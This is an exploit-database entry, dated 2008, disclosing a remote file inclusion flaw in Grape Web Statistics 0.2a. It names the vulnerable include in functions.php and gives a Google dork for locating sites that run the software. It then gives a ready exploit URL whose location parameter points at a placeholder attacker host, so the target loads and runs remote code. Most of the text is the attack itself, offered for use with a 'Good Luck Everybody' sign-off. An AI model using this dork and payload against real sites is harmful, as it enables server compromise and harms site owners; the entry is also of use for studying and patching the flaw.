id: 2890
date: 04/17/2008
title: Grape Statistics 0.2a (location) Remote File Inclusion Vulnerability
author: MajnOoNxHaCkEr
cves: 

====================================================================
Grape Statistics 0.2a (location) Remote File Inclusion Vulnerability
====================================================================




# Name : Grape Web Statistics Remote File include Vulnerability
# Download From :http://www.quate.net/link.php?grape
# Found By : MajnOoNxHaCkEr                  
============================================================================
# Vulne Code In File functions.php :

#Function: require

# DorK In GooGle : "Developed by Quate.net."

# Exploit:

http://WwW.4RxH.CoM/[PaTh]/includes/functions.php?location=[EV!L]

That,s It,s

Good Luck Everybody
============================================================================




#  0day.today [2023-03-27]  #